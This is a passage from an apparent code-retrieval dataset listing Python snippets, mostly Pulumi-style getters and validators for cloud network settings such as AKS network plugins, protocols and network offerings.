"def subnet_id(self):\n return self._subnet_id",
"def name(self):\n return 'VL53L1X'",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def RouteDistinguisherIpAddress(self):\n return self._get_attribute('routeDistinguisherIpAddress')",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def create_vlan(module, switch, vlan_id, untagged_ports=None):\n global CHANGED_FLAG\n output = ''\n new_vlan = False\n\n cli = pn_cli(module)\n cli += ' vlan-show format id no-show-headers '\n existing_vlans = run_cli(module, cli)\n\n if existing_vlans is not None:\n existing_vlans = existing_vlans.split()\n if vlan_id not in existing_vlans:\n new_vlan = True\n\n if new_vlan or existing_vlans is None:\n cli = pn_cli(module)\n cli += ' vlan-create id %s scope fabric ' % vlan_id\n\n if untagged_ports is not None:\n cli += ' untagged-ports %s ' % untagged_ports\n\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created vlan with id %s\\n' % (switch, vlan_id)\n\n return output"
] | [
"0.7999924",
"0.7726699",
"0.7723152",
"0.75627106",
"0.6896781",
"0.68907255",
"0.66186804",
"0.6475853",
"0.6435667",
"0.64156556",
"0.6283416",
"0.62097275",
"0.62097275",
"0.62045115",
"0.579412",
"0.5772401",
"0.57347697",
"0.56815064",
"0.5577279",
"0.5575757",
"0.5513762",
"0.53874314",
"0.5357877",
"0.5307194",
"0.52880514",
"0.52356",
"0.52324003",
"0.52150667",
"0.5205583",
"0.5205424",
"0.5182322",
"0.5181402",
"0.5181402",
"0.5166206",
"0.51448596",
"0.5138239",
"0.5129257",
"0.5125093",
"0.51002944",
"0.5092885",
"0.5092885",
"0.5092885",
"0.5091799",
"0.50541705",
"0.5048843",
"0.5019748",
"0.49930835",
"0.49746278",
"0.4960606",
"0.49599355",
"0.495937",
"0.49576157",
"0.49480367",
"0.4940397",
"0.493007",
"0.4917736",
"0.49088886",
"0.4890636",
"0.48739162",
"0.4867709",
"0.4861594",
"0.48556358",
"0.4849366",
"0.48490348",
"0.48423594",
"0.48384184",
"0.48313564",
"0.48265526",
"0.48254472",
"0.4822892",
"0.4809546",
"0.4808165",
"0.48000398",
"0.47978896",
"0.47975978",
"0.47915488",
"0.47674677",
"0.47535634",
"0.47476095",
"0.47443464",
"0.4732304",
"0.47172344",
"0.47172084",
"0.4706235",
"0.46897304",
"0.46748835",
"0.46580702",
"0.4656013",
"0.46523625",
"0.46487445",
"0.46460047",
"0.46415251",
"0.46415251",
"0.46406233",
"0.46358407",
"0.4633533",
"0.46328533",
"0.46235913",
"0.4622502",
"0.458832"
] | 0.74945563 | 4 |
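Editor's note: the record above pairs an `Input[float]` getter (the document) with an `Output[float]` getter (the top-scored negative); the same property appears as an input when constructing a resource and as an output when reading it back. A generic sketch of consuming such an output inside a Pulumi program; the literal VLAN value 1001 is a placeholder.

    import pulumi

    # Outputs resolve asynchronously; derive values from them with .apply.
    vlan_output: pulumi.Output[float] = pulumi.Output.from_input(1001)
    vlan_tag = vlan_output.apply(lambda v: f"vlan-{int(v)}")
    pulumi.export("vlan_tag", vlan_tag)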
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The indicator of whether or not to disable IPAM allocation on the network attachment definition injected into the Hybrid AKS Cluster. | def hybrid_aks_ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]]:
return pulumi.get(self, "hybrid_aks_ipam_enabled") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'L3NetworkConfigurationIpamEnabled']]]:\n return pulumi.get(self, \"ipam_enabled\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allow_v_net_override(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def allowNoIngressLabel(self):\n if self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def __init__(__self__, *,\n disable_outbound_nat: Optional[pulumi.Input[bool]] = None):\n if disable_outbound_nat is not None:\n pulumi.set(__self__, \"disable_outbound_nat\", disable_outbound_nat)",
"def setDefaultCapability(self, b):\n self.defaultAllow = b",
"def allow_v_net_override(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n ipv4_cidr_block: Optional[pulumi.Input[str]] = None,\n use_service_networking: Optional[pulumi.Input[bool]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if ipv4_cidr_block is not None:\n pulumi.set(__self__, \"ipv4_cidr_block\", ipv4_cidr_block)\n if use_service_networking is not None:\n pulumi.set(__self__, \"use_service_networking\", use_service_networking)",
"def nfc_beam_disabled(self):\n return self._nfc_beam_disabled",
"def disable_outbound_nat(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_outbound_nat\")",
"def setAllowAnnotations(self,value):\n self.PDFreactorConfiguration.in1[\"allowAnnotations\"] = value",
"def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def privacy_protocol_not(self, privacy_protocol_not):\n\n self._privacy_protocol_not = privacy_protocol_not",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def allowNoIngressLabel(self):\n if (self.ingresslabels != None):\n return self.ingresslabels.isempty()\n elif self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def enable_network_egress_metering(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_network_egress_metering\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def reason_to_be_disabled(cls):\n # Assume by default the given decoder is always enabled.\n return None",
"def client_ip_preservation_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"client_ip_preservation_enabled\")",
"def pre_network_ipam_create(self, resource_dict):\n pass",
"def disable_openapi_validation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def is_disable_apic(self):\n\t\treturn bool(call_sdk_function('PrlVmCfg_IsDisableAPIC', self.handle))",
"def deny(ip):\n return __apf_cmd(\"-d {}\".format(ip))",
"def disable():\n if _status_apf():\n return __apf_cmd(\"-f\")",
"def enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n\n return pulumi.get(self, \"enabled\")",
"def only_use_host_ips(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"only_use_host_ips\")",
"def disable_probe(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_probe\")",
"def disable_suppress_accessibility_service(self) -> Optional[bool]:\n return self.get_capability(DISABLE_SUPPRESS_ACCESSIBILITY_SERVICE)",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def get_disable_vpa(self) -> bool:\n return self._get_disable_vpa(enable_validation=True)",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def require_privmsg():\n def add_attribute(func):\n if not hasattr(func, \"priv_msg\"):\n func.priv_msg = True\n return func\n return add_attribute",
"def enable_node_autoprovisioning(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_node_autoprovisioning\")",
"def publicly_advertisable(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def disable_bgp_route_propagation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"disabled_by_microsoft\")",
"def unclean_leader_election_enable(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated and no longer functional.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"unclean_leader_election_enable is deprecated: This field is deprecated and no longer functional.\"\"\")\n\n return pulumi.get(self, \"unclean_leader_election_enable\")",
"def disable_probe(self) -> pulumi.Input[bool]:\n return pulumi.get(self, \"disable_probe\")",
"def enable_private_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_endpoint\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def isNoModifiable(self):\n return self.f4 is '-'",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def post_network_ipam_create(self, resource_dict):\n pass",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def pre_network_ipam_update(self, resource_id, resource_dict):\n pass",
"def auto_assign(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"auto_assign\")",
"def nfc_beam_disabled(self, nfc_beam_disabled):\n\n self._nfc_beam_disabled = nfc_beam_disabled",
"def add_annotation_to_placement(self):\n\n config.switch_acm_ctx()\n placcement_obj = ocp.OCP(\n kind=constants.PLACEMENT_KIND,\n resource_name=self.appset_placement_name,\n namespace=\"openshift-gitops\",\n )\n placcement_obj.annotate(\n annotation=\"cluster.open-cluster-management.io/experimental-scheduling-disable='true'\"\n )",
"def check_disabled(self):\n return None",
"def public_access_behind_virtual_network_enabled(self) -> pulumi.Output[Optional[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def enable(self):\n return self._packet.get('enable', False)\n\n # TODO: TCONT and GEM lists",
"def __init__(__self__, *,\n disable: Optional[pulumi.Input[bool]] = None):\n if disable is not None:\n pulumi.set(__self__, \"disable\", disable)",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def gateway_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def is_ap(self, obj):\n return hasattr(obj, 'attachment_point_info')",
"def policy_net(self) -> bool:\n raise NotImplementedError()",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n evaluation_mode: Optional[pulumi.Input['BinaryAuthorizationEvaluationMode']] = None):\n if enabled is not None:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if evaluation_mode is not None:\n pulumi.set(__self__, \"evaluation_mode\", evaluation_mode)",
"def _disallow_public_access(self) -> typing.Optional[bool]:\n return jsii.get(self, \"disallowPublicAccess\")"
] | [
"0.6013737",
"0.6013737",
"0.57309324",
"0.56934357",
"0.5477145",
"0.52816826",
"0.52816826",
"0.5257691",
"0.52326876",
"0.5207934",
"0.5207934",
"0.5186799",
"0.5176646",
"0.5155211",
"0.51384276",
"0.51132184",
"0.51126623",
"0.5108996",
"0.5088345",
"0.5074993",
"0.50374025",
"0.50374025",
"0.502866",
"0.4987369",
"0.49835715",
"0.49835715",
"0.49746785",
"0.49510312",
"0.49510312",
"0.49333188",
"0.49175933",
"0.49175933",
"0.48913816",
"0.48889226",
"0.48697925",
"0.48672795",
"0.4862197",
"0.485626",
"0.48474213",
"0.48440838",
"0.48397937",
"0.48273247",
"0.4821657",
"0.48164827",
"0.48009",
"0.4798712",
"0.47872895",
"0.477853",
"0.47783735",
"0.47631282",
"0.47491297",
"0.47470894",
"0.47408387",
"0.4734773",
"0.47307208",
"0.4729707",
"0.47255903",
"0.47255903",
"0.47110194",
"0.47110194",
"0.47103104",
"0.47074825",
"0.47074825",
"0.4705467",
"0.46974277",
"0.46974277",
"0.4695587",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.46838656",
"0.46782324",
"0.46675628",
"0.466535",
"0.46644998",
"0.46468756",
"0.4643937",
"0.4637061",
"0.46364728",
"0.46364728",
"0.46342462",
"0.46342462",
"0.46326265",
"0.46284676",
"0.46244952",
"0.46244952",
"0.462442",
"0.46117365",
"0.46091154",
"0.46012294",
"0.4598274",
"0.45979503"
] | 0.0 | -1 |
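Editor's note: several negatives in the record above (e.g. the `public_access_behind_virtual_network_enabled` and `unclean_leader_election_enable` getters) show how deprecated fields such as `hybrid_aks_ipam_enabled` are surfaced in generated Pulumi code: the getter emits a Python `DeprecationWarning` and a Pulumi log warning before returning the stored value. A condensed sketch of that pattern; the surrounding class is illustrative.

    import warnings
    import pulumi

    @pulumi.input_type
    class DeprecatedFieldArgs:
        def __init__(__self__, *, hybrid_aks_ipam_enabled=None):
            if hybrid_aks_ipam_enabled is not None:
                pulumi.set(__self__, "hybrid_aks_ipam_enabled", hybrid_aks_ipam_enabled)

        @property
        @pulumi.getter(name="hybridAksIpamEnabled")
        def hybrid_aks_ipam_enabled(self):
            # Deprecated fields warn on access but still return the stored value.
            warnings.warn("Field Deprecated. The value will be ignored.", DeprecationWarning)
            pulumi.log.warn("hybrid_aks_ipam_enabled is deprecated and will be ignored.")
            return pulumi.get(self, "hybrid_aks_ipam_enabled")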
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The network plugin type for Hybrid AKS. | def hybrid_aks_plugin_type(self) -> Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]]:
return pulumi.get(self, "hybrid_aks_plugin_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:\n return pulumi.get(self, \"network_plugin\")",
"def network_plugin_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkPluginMode']]]:\n return pulumi.get(self, \"network_plugin_mode\")",
"def get_network_plugin(self) -> Union[str, None]:\n\n return self._get_network_plugin(enable_validation=True)",
"def get_network_plugin_mode(self) -> Union[str, None]:\n return self._get_network_plugin_mode(enable_validation=True)",
"def _get_network_plugin(self, enable_validation: bool = False) -> Union[str, None]:\n # read the original value passed by the command\n network_plugin = self.raw_param.get(\"network_plugin\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.network_profile and\n self.mc.network_profile.network_plugin is not None\n ):\n network_plugin = self.mc.network_profile.network_plugin\n\n # this parameter does not need dynamic completion\n # validation\n if enable_validation:\n (\n pod_cidr,\n service_cidr,\n dns_service_ip,\n docker_bridge_address,\n network_policy,\n ) = self._get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy(\n enable_validation=False\n )\n network_plugin_mode = self._get_network_plugin_mode(enable_validation=False)\n if network_plugin:\n if network_plugin == \"azure\" and pod_cidr and network_plugin_mode != \"overlay\":\n raise InvalidArgumentValueError(\n \"Please specify network plugin mode `overlay` when using --pod-cidr or \"\n \"use network plugin `kubenet`. For more information about Azure CNI \"\n \"Overlay please see https://aka.ms/aks/azure-cni-overlay\"\n )\n else:\n if (\n pod_cidr or\n service_cidr or\n dns_service_ip or\n docker_bridge_address or\n network_policy\n ):\n raise RequiredArgumentMissingError(\n \"Please explicitly specify the network plugin type\"\n )\n return network_plugin",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def _validate_network_plugin(\n self, context, network_info,\n plugin_type=projectpluginmap.NsxPlugins.NSX_V):\n if not network_info.get('network_id'):\n msg = _(\"network_id must be specified\")\n raise n_exc.BadRequest(resource=bgp_ext.BGP_SPEAKER_RESOURCE_NAME,\n msg=msg)\n net_id = network_info['network_id']\n p = self._core_plugin._get_plugin_from_net_id(context, net_id)\n if p.plugin_type() != plugin_type:\n msg = (_('Network should belong to the %s plugin as the bgp '\n 'speaker') % plugin_type)\n raise n_exc.InvalidInput(error_message=msg)",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def scenario(self):\n warnings.simplefilter('always', PendingDeprecationWarning)\n warnings.warn(\n \"self.k.scenario will be deprecated in a future release. Please \"\n \"use self.k.network instead.\",\n PendingDeprecationWarning\n )\n return self.network",
"def get_ui_field_behaviour() -> dict[str, Any]:\n return {\n \"hidden_fields\": [\"port\", \"schema\"],\n \"relabeling\": {\"host\": \"Connection URL\"},\n }",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def backend_plugin(self):\n return None",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def _commercial_fields(self):\n return ['website']",
"def plugin_name(self):\n return \"optipng\"",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
